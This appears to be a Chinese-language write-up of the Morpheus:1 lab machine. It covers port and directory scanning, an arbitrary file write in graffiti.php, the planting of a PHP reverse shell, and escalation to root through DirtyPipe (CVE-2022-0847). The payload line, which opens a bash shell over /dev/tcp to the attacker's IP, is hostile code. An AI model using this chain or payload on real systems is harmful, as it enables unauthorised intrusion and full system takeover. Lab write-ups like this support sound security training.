知识点
- SecLists字典
- gobuster工具
- php 文件写入
- PEASS-ng辅助提权工具
- CVE-2022-0847
开放端口
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_ 256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open http Apache httpd 2.4.51 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open http nginx 1.18.0
目录扫描
gobuster工具配合 SecLists字典大全
gobuster.exe dir -w directory-list-2.3-medium.txt -x php,txt -u http://192.168.78.154/
/index.php (Status: 200) [Size: 6]
/javascript (Status: 301) [Size: 321] [--> http://192.168.78.154/javascript/]
/robots.txt (Status: 200) [Size: 47]
/graffiti.php (Status: 200) [Size: 468]
/graffiti.txt (Status: 200) [Size: 142]
访问/graffiti.php 文件
在post请求包中 file参数,有可能存在文件读取漏洞,将graffiti.txt 改为php看看,发现可以读取文件
代码审计
graffiti.php 当post参数message不为空时,写入文件名和内容
<?php
$file="graffiti.txt";
if($_SERVER['REQUEST_METHOD'] == 'POST') {
if (isset($_POST['file'])) {
$file=$_POST['file'];
}
if (isset($_POST['message'])) {
$handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
fwrite($handle, $_POST['message']);
fwrite($handle, "\n");
fclose($file);
}
}
// Display file
$handle = fopen($file,"r");
while (!feof($handle)) {
echo fgets($handle);
echo "<br>\n";
}
fclose($handle);
?>
写入php文件
写入webshell
通过反弹shell
写入php文件
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/192.168.78.152/1234 0>&1'"); ?>
提权
PEASS-ng辅助提权工具
扫描出来提权的CVE漏洞
DirtyPipe CVE-2022-0847
成功提权root
